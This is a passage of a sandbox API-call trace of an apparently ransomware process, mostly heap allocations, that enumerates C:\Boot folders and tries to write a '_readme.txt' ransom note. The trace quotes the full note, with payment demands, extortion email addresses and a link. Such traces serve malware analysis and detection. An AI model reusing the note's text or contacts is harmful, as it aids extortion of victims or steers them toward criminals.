(HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.626] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9cb0 [0209.626] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.626] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.626] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.626] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9cb0 [0209.626] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0xc46) returned 0x3a83058 [0209.626] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.626] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a83058 | out: hHeap=0x750000) returned 1 [0209.626] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.626] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.626] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x840) returned 0x32d9cb0 [0209.626] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.626] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.626] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.626] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x840) returned 0x32d9cb0 [0209.626] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.626] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.626] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.627] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9cb0 [0209.627] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.627] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.627] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.627] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9cb0 [0209.627] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.627] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.627] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.627] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9cb0 [0209.627] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.627] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.627] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.627] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9cb0 [0209.627] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.627] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.627] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.627] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9cb0 [0209.627] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.627] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.627] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.627] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9cb0 [0209.627] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.627] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.627] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.627] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9cb0 [0209.627] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.628] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.628] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.628] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9cb0 [0209.628] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0xc46) returned 0x3a83058 [0209.628] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.628] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a83058 | out: hHeap=0x750000) returned 1 [0209.628] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.628] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.628] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9cb0 [0209.628] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.628] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.628] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.628] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x860) returned 0x3a83058 [0209.628] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a83058 | out: hHeap=0x750000) returned 1 [0209.628] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.628] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.628] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x860) returned 0x3a83058 [0209.628] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a83058 | out: hHeap=0x750000) returned 1 [0209.628] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.628] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.628] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9cb0 [0209.628] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.628] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.628] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.628] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9cb0 [0209.628] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.629] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.629] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.629] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9cb0 [0209.629] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0xc46) returned 0x3a83058 [0209.629] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.629] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a83058 | out: hHeap=0x750000) returned 1 [0209.629] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.629] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.629] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x840) returned 0x32d9cb0 [0209.629] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.629] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.629] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.629] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x840) returned 0x32d9cb0 [0209.629] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.629] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.629] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.629] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9cb0 [0209.629] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.629] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.629] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.629] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9cb0 [0209.629] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.629] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.629] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.629] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9cb0 [0209.629] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.629] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.629] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.629] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9cb0 [0209.630] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.630] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.630] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.630] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9cb0 [0209.630] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.630] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.630] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.630] PathFindFileNameW (pszPath="C:\\Boot\\el-GR\\") returned="el-GR\\" [0209.630] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0209.630] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.630] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0209.630] PathFindFileNameW (pszPath="") returned="" [0209.630] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x761b0000 [0209.631] GetProcAddress (hModule=0x761b0000, lpProcName="SHGetFolderPathW") returned 0x76235708 [0209.631] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x3a83058 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0209.631] FreeLibrary (hLibModule=0x761b0000) returned 1 [0209.631] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.631] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a83058 | out: hHeap=0x750000) returned 1 [0209.631] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.631] PathAppendW (in: pszPath="C:\\Boot\\el-GR\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\el-GR\\_readme.txt") returned 1 [0209.631] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9428 [0209.631] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.631] PathFileExistsW (pszPath="C:\\Boot\\el-GR\\_readme.txt") returned 0 [0209.632] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x7d00) returned 0x3a87060 [0209.632] lstrcpyW (in: lpString1=0x3a87060, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-WOqGXn9sLJ\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0215Asd4a7d6" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-WOqGXn9sLJ\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0215Asd4a7d6") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-WOqGXn9sLJ\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0215Asd4a7d6" [0209.632] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-WOqGXn9sLJ\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0215Asd4a7d6", lpString2="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-WOqGXn9sLJ\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0215Asd4a7d6KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-WOqGXn9sLJ\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0215Asd4a7d6KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk" [0209.632] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32da538 [0209.632] CreateFileW (lpFileName="C:\\Boot\\el-GR\\_readme.txt" (normalized: "c:\\boot\\el-gr\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0209.632] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32da538 | out: hHeap=0x750000) returned 1 [0209.632] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a87060 | out: hHeap=0x750000) returned 1 [0209.632] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.632] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.632] FindFirstFileW (in: lpFileName="C:\\Boot\\el-GR\\*", lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3277d28 [0209.633] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.633] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0209.633] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xea239054, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x17250, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0209.633] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xea239054, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x17250, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0209.633] FindClose (in: hFindFile=0x3277d28 | out: hFindFile=0x3277d28) returned 1 [0209.633] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.633] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286440 | out: hHeap=0x750000) returned 1 [0209.633] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286440 [0209.633] PeekMessageW (in: lpMsg=0x397fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x397fb74) returned 0 [0209.633] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.633] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9428 [0209.633] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.633] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.633] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.633] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9428 [0209.633] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.633] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.633] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.633] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9428 [0209.634] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.634] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.634] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.634] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9428 [0209.634] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.634] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.634] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.634] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9428 [0209.634] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.634] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.634] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.634] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x840) returned 0x32d9428 [0209.634] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.634] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.634] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.634] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9428 [0209.634] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0xc2e) returned 0x3a83058 [0209.634] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.634] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a83058 | out: hHeap=0x750000) returned 1 [0209.634] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.634] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.634] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9428 [0209.634] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.634] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.635] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.635] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x840) returned 0x32d9428 [0209.635] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.635] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.635] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.635] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x860) returned 0x3a83058 [0209.635] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a83058 | out: hHeap=0x750000) returned 1 [0209.635] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.635] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.635] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, 